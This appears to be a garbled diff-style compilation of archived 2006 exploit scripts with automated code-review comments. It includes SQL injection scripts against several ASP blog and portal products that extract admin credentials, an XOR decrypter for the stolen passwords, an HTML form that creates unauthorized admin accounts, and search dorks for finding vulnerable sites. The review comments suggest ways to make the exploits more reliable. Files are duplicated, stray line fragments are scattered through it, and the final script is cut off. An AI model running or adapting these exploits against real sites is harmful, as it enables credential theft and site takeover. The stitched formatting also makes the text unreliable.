* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";

for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
<--End of code-->
<--Thanks |SaMaN| for decrypter-->

// milw0rm.com [2006-03-04]

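Review bot: `buf2` is declared but never initialised before the loop calls `strncat(buf2, buf3, 250)`, so the output is appended to whatever the stack happened to contain (undefined behaviour, and a textbook source of garbage or a crash); `char buf2[255] = {0};` fixes it, and `strncat`'s size argument should then be the remaining space, not a constant 250 on a 255-byte buffer. `vcrypt == ""` compares a pointer with a string literal rather than the contents, `if (!texto)` is always false because `texto = buf`, `x` is read before it is ever assigned (`x = x + 1`) and then never used, and `return;` inside `int main` returns no value (`return 0;`). A short comment stating the transform (`255 - byte`, then `toascii`, which masks to 7 bits) would document what "default data" in the note above actually means.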
@ -1,68 +1,68 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket;
if(@ARGV < 2){
print "
+***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+ Usage: cilem.pl <victim> <directory> +
+ Example: cilem.pl sux.com / +
+ googledork [ inurl:yazdir.asp?haber_id= ] +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver;
$port = "80";
$cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

# milw0rm.com [2006-03-07]

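Review bot: the second match, `/(.*?)<\/font><\/td>/`, has nothing in front of the capture, so on the first response line that contains `</font></td>` it reports whatever precedes that tag as `PASSWORD:` and exits, whether or not the `USERNAME:` branch ever fired; the username pattern at least keys on `font-weight:700\">`. That makes the "Exploit succeed!" output unreliable as evidence, which is the point of a PoC. As in `penta.pl`, the `Internal Server Error` and `number of columns` branches are verbatim copies and should be one condition, and the script has no `use strict`/`use warnings`.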
@ -1,55 +1,55 @@
#!/usr/bin/perl -w
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)

require LWP::UserAgent;
require HTTP::Request;
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";

if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit ();
}


my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);

my $Path = $ARGV[0];

my $Page = $ARGV[1];

my $URL = "http://".$Path.$Page;

print "|***| Connecting to ".$URL." ...\r\n";

$r = HTTP::Request->new(GET => $URL."?action=edit");

$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );

$res = $ua->request($r);

print "|***| Connected !\r\n";

if ($res->is_success) {

print "|***| Extracting Username and Password ...\r\n\r\n";

my $results = $res->content;

while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }

print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";

} else {
die "\r\n|***| ".$res->status_line;
}

# milw0rm.com [2006-03-09]

#!/usr/bin/perl -w
|
||||
# D2KBLOG SQL injection
|
||||
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
|
||||
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
|
||||
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
|
||||
|
||||
require LWP::UserAgent;
|
||||
require HTTP::Request;
|
||||
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
|
||||
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
|
||||
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
|
||||
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
|
||||
print "\r\n=-=-=-==================================================================-=-=-=\r\n";
|
||||
|
||||
if (@ARGV != 2)
|
||||
{
|
||||
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
|
||||
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
|
||||
exit ();
|
||||
}
|
||||
|
||||
|
||||
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
|
||||
|
||||
my $Path = $ARGV[0];
|
||||
|
||||
my $Page = $ARGV[1];
|
||||
|
||||
my $URL = "http://".$Path.$Page;
|
||||
|
||||
print "|***| Connecting to ".$URL." ...\r\n";
|
||||
|
||||
$r = HTTP::Request->new(GET => $URL."?action=edit");
|
||||
|
||||
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
|
||||
|
||||
$res = $ua->request($r);
|
||||
|
||||
print "|***| Connected !\r\n";
|
||||
|
||||
if ($res->is_success) {
|
||||
|
||||
print "|***| Extracting Username and Password ...\r\n\r\n";
|
||||
|
||||
my $results = $res->content;
|
||||
|
||||
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
|
||||
|
||||
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
|
||||
|
||||
} else {
|
||||
die "\r\n|***| ".$res->status_line;
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-09]
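Review bot: every line of this 55-line file appears on both sides of the hunk with identical text, so the change is most likely whitespace or line endings only; the commit message should say so, or the diff should be re-checked with whitespace ignored, because a full-file rewrite with no visible content change would also hide a real edit. On the code itself, the script runs under `-w` but has no `use strict`, and `$r` (`HTTP::Request->new(...)`) and `$res` (`$ua->request($r)`) are never declared with `my` while `$ua`, `$Path`, `$Page` and `$URL` are; declare them consistently. The usage messages end in `\n\r\n` while every other line uses `\r\n`.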
@ -1,57 +1,57 @@
<html>
|
||||
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
|
||||
<body bgcolor="#000000">
|
||||
<style>
|
||||
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
|
||||
</style>
|
||||
<script language="JavaScript">
|
||||
function jbxpl() {
|
||||
if (document.xplt.victim.value=="") {
|
||||
alert("Please enter site!");
|
||||
return false;
|
||||
}
|
||||
if (confirm("Are you sure?")) {
|
||||
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
|
||||
xplt.aName.value=document.xplt.aName.value;
|
||||
xplt.aEmail.value=document.xplt.aEmail.value;
|
||||
xplt.aPassword.value=document.xplt.aPassword.value;
|
||||
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
|
||||
xplt.aIsActive=document.xplt.aIsActive.value;
|
||||
xplt.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<strong>
|
||||
<font class="xpl" color="#00FF40">
|
||||
<pre>
|
||||
<center>
|
||||
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
|
||||
This exploit has been coded by nukedx
|
||||
You can found original advisory on http://www.nukedx.com/?viewdoc=19
|
||||
Dork for this exploit: <u>inurl:JBSPro</u>
|
||||
Your target must be like that: www.victim.com/Path/
|
||||
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
|
||||
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
|
||||
For second example your target must be www.victim.com/
|
||||
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
|
||||
Have phun
|
||||
<form name="xplt" method="POST" onsubmit="jbxpl();">
|
||||
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
|
||||
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
|
||||
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
|
||||
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
|
||||
<input type="hidden" name="aIsSystemAdmin" value="True">
|
||||
<input type="hidden" name="aIsActive" value="True">
|
||||
<input type="submit" value="Send" class="xpl">
|
||||
</form>
|
||||
</pre>
|
||||
</font>
|
||||
</strong>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Save this code as .htm and then execute.
|
||||
|
||||
# nukedx.com [2006-03-07]
|
||||
|
||||
# milw0rm.com [2006-03-09]
|
||||
<html>
|
||||
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
|
||||
<body bgcolor="#000000">
|
||||
<style>
|
||||
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
|
||||
</style>
|
||||
<script language="JavaScript">
|
||||
function jbxpl() {
|
||||
if (document.xplt.victim.value=="") {
|
||||
alert("Please enter site!");
|
||||
return false;
|
||||
}
|
||||
if (confirm("Are you sure?")) {
|
||||
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
|
||||
xplt.aName.value=document.xplt.aName.value;
|
||||
xplt.aEmail.value=document.xplt.aEmail.value;
|
||||
xplt.aPassword.value=document.xplt.aPassword.value;
|
||||
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
|
||||
xplt.aIsActive=document.xplt.aIsActive.value;
|
||||
xplt.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<strong>
|
||||
<font class="xpl" color="#00FF40">
|
||||
<pre>
|
||||
<center>
|
||||
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
|
||||
This exploit has been coded by nukedx
|
||||
You can found original advisory on http://www.nukedx.com/?viewdoc=19
|
||||
Dork for this exploit: <u>inurl:JBSPro</u>
|
||||
Your target must be like that: www.victim.com/Path/
|
||||
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
|
||||
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
|
||||
For second example your target must be www.victim.com/
|
||||
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
|
||||
Have phun
|
||||
<form name="xplt" method="POST" onsubmit="jbxpl();">
|
||||
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
|
||||
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
|
||||
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
|
||||
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
|
||||
<input type="hidden" name="aIsSystemAdmin" value="True">
|
||||
<input type="hidden" name="aIsActive" value="True">
|
||||
<input type="submit" value="Send" class="xpl">
|
||||
</form>
|
||||
</pre>
|
||||
</font>
|
||||
</strong>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Save this code as .htm and then execute.
|
||||
|
||||
# nukedx.com [2006-03-07]
|
||||
|
||||
# milw0rm.com [2006-03-09]
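Review bot: the `<center>` opened before the welcome text is never closed and `<title>` sits outside any `<head>`, so the page is not well-formed HTML even though browsers render it. In `jbxpl()` the `return false` for an empty target has no effect, because `onsubmit="jbxpl();"` discards the return value (it would need `return jbxpl();`), and the two assignments `xplt.aIsSystemAdmin=...` and `xplt.aIsActive=...` set properties on the form object rather than the inputs' `.value`, which the hidden fields already carry, so both lines are no-ops. The fact a defender needs from this entry, that `files/update.asp?Action=AddAdmin` accepts an admin-creation POST without authentication, is only implied by the form; the header text should state it plainly.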
@ -1,67 +1,67 @@
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=20
|
||||
#Usage: beta.pl <host> <path>
|
||||
#googledork: [ "Powered by bp blog" ] 9.710 pages..
|
||||
use IO::Socket;
|
||||
if(@ARGV != 2) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
|
||||
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to BetaParticle ex: /blog\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit () {
|
||||
#Our variables...
|
||||
$bpserver = $ARGV[0];
|
||||
$bpserver =~ s/(http:\/\/)//eg;
|
||||
$bphost = "http://".$bpserver;
|
||||
$bpdir = $ARGV[1];
|
||||
$bpport = "80";
|
||||
$bptar = "template_gallery_detail.asp?fldGalleryID=";
|
||||
$bpfinal = "main.asp";
|
||||
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
|
||||
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $bpserver\r\n";
|
||||
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
|
||||
print $bp "GET $bpreq HTTP/1.1\n";
|
||||
print $bp "Accept: */*\n";
|
||||
print $bp "Referer: $bphost\n";
|
||||
print $bp "Accept-Language: tr\n";
|
||||
print $bp "User-Agent: NukeZilla 4.3\n";
|
||||
print $bp "Cache-Control: no-cache\n";
|
||||
print $bp "Host: $bpserver\n";
|
||||
print $bp "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$bp>) {
|
||||
if ($answer =~ /<h3>(.*?)<\/h3>/) {
|
||||
print "- Exploit succeed! Getting admin's information\r\n";
|
||||
print "- Username: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /<p>(.*?)<\/p>/) {
|
||||
print "- Password: $1\r\n";
|
||||
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of BetaParticle is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-18]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=20
|
||||
#Usage: beta.pl <host> <path>
|
||||
#googledork: [ "Powered by bp blog" ] 9.710 pages..
|
||||
use IO::Socket;
|
||||
if(@ARGV != 2) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
|
||||
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to BetaParticle ex: /blog\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit () {
|
||||
#Our variables...
|
||||
$bpserver = $ARGV[0];
|
||||
$bpserver =~ s/(http:\/\/)//eg;
|
||||
$bphost = "http://".$bpserver;
|
||||
$bpdir = $ARGV[1];
|
||||
$bpport = "80";
|
||||
$bptar = "template_gallery_detail.asp?fldGalleryID=";
|
||||
$bpfinal = "main.asp";
|
||||
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
|
||||
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $bpserver\r\n";
|
||||
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
|
||||
print $bp "GET $bpreq HTTP/1.1\n";
|
||||
print $bp "Accept: */*\n";
|
||||
print $bp "Referer: $bphost\n";
|
||||
print $bp "Accept-Language: tr\n";
|
||||
print $bp "User-Agent: NukeZilla 4.3\n";
|
||||
print $bp "Cache-Control: no-cache\n";
|
||||
print $bp "Host: $bpserver\n";
|
||||
print $bp "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$bp>) {
|
||||
if ($answer =~ /<h3>(.*?)<\/h3>/) {
|
||||
print "- Exploit succeed! Getting admin's information\r\n";
|
||||
print "- Username: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /<p>(.*?)<\/p>/) {
|
||||
print "- Password: $1\r\n";
|
||||
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of BetaParticle is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-18]
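Review bot: `$bpserver =~ s/(http:\/\/)//eg;` uses the `/e` flag, which evaluates the empty replacement as Perl code; the intent is a plain strip of the scheme prefix, so it should read `s{^http://}{}`. `usage()` and `exploit()` are called in the `if(@ARGV != 2)` line before `sub exploit ()` is declared with an empty prototype, so the prototype is never checked and under `-w` only produces a "called too early to check prototype" warning; drop the prototypes. There is no `use strict`/`use warnings`, every variable is a global, and the closing `print "- Exploit failed\n"` relies on being the last statement of the block to omit its semicolon. The `exit()` calls inside the `while` loop leave `$bp` unclosed.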
@ -1,87 +1,87 @@
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=21
|
||||
#Usage: aspp.pl <host> <path> <user>
|
||||
use IO::Socket;
|
||||
use Math::BigInt;
|
||||
if(@ARGV != 3) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-21\r\n";
|
||||
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path> <user>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
|
||||
print "- <user> -> Username that you want password. ex: admin\r\n";
|
||||
exit();
|
||||
}
|
||||
sub decrypt ()
|
||||
{
|
||||
$lp = length($appass);
|
||||
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
|
||||
if ($lp == 0) { die("- An error occurued\r\n"); }
|
||||
for ($i = 0; $i < $lp ; $i++) {
|
||||
$f = $lp - $i - 1; # Formula for getting character via substr...
|
||||
$n = substr($apkey,$f,1);
|
||||
$l = substr($appass,$f,1);
|
||||
$appwd = chr(ord($n)^ord($l)).$appwd;
|
||||
}
|
||||
print "- Password decrypted as: $appwd\r\n";
|
||||
print "- Lets go $aphost$apdir$apfinal for login\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$apserver = $ARGV[0];
|
||||
$apserver =~ s/(http:\/\/)//eg;
|
||||
$aphost = "http://".$apserver;
|
||||
$apdir = $ARGV[1];
|
||||
$apport = "80";
|
||||
$aptar = "content/downloads/download_click.asp?downloadid=";
|
||||
$apfinal = "content/users/login.asp";
|
||||
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
|
||||
$apreq = $aphost.$apdir.$aptar.$apxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $apserver\r\n";
|
||||
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
|
||||
print $ap "GET $apreq HTTP/1.1\n";
|
||||
print $ap "Accept: */*\n";
|
||||
print $ap "Referer: $aphost\n";
|
||||
print $ap "Accept-Language: tr\n";
|
||||
print $ap "User-Agent: NukeZilla\n";
|
||||
print $ap "Cache-Control: no-cache\n";
|
||||
print $ap "Host: $apserver\n";
|
||||
print $ap "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$ap>) {
|
||||
if ($answer =~ /string: "(.*?)"]'/) {
|
||||
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
|
||||
print "- Username: $ARGV[2]\r\n";
|
||||
print "- Decrypting password....\r\n";
|
||||
$appass = $1;
|
||||
$appass =~ s/(")/chr(34)/eg;
|
||||
$appass =~ s/(<)/chr(60)/eg;
|
||||
$appass =~ s/(>)/chr(62)/eg;
|
||||
$appass =~ s/( )/chr(32)/eg;
|
||||
decrypt();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of ASPPortal is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-20]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=21
|
||||
#Usage: aspp.pl <host> <path> <user>
|
||||
use IO::Socket;
|
||||
use Math::BigInt;
|
||||
if(@ARGV != 3) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-21\r\n";
|
||||
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path> <user>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
|
||||
print "- <user> -> Username that you want password. ex: admin\r\n";
|
||||
exit();
|
||||
}
|
||||
sub decrypt ()
|
||||
{
|
||||
$lp = length($appass);
|
||||
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
|
||||
if ($lp == 0) { die("- An error occurued\r\n"); }
|
||||
for ($i = 0; $i < $lp ; $i++) {
|
||||
$f = $lp - $i - 1; # Formula for getting character via substr...
|
||||
$n = substr($apkey,$f,1);
|
||||
$l = substr($appass,$f,1);
|
||||
$appwd = chr(ord($n)^ord($l)).$appwd;
|
||||
}
|
||||
print "- Password decrypted as: $appwd\r\n";
|
||||
print "- Lets go $aphost$apdir$apfinal for login\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$apserver = $ARGV[0];
|
||||
$apserver =~ s/(http:\/\/)//eg;
|
||||
$aphost = "http://".$apserver;
|
||||
$apdir = $ARGV[1];
|
||||
$apport = "80";
|
||||
$aptar = "content/downloads/download_click.asp?downloadid=";
|
||||
$apfinal = "content/users/login.asp";
|
||||
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
|
||||
$apreq = $aphost.$apdir.$aptar.$apxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $apserver\r\n";
|
||||
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
|
||||
print $ap "GET $apreq HTTP/1.1\n";
|
||||
print $ap "Accept: */*\n";
|
||||
print $ap "Referer: $aphost\n";
|
||||
print $ap "Accept-Language: tr\n";
|
||||
print $ap "User-Agent: NukeZilla\n";
|
||||
print $ap "Cache-Control: no-cache\n";
|
||||
print $ap "Host: $apserver\n";
|
||||
print $ap "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$ap>) {
|
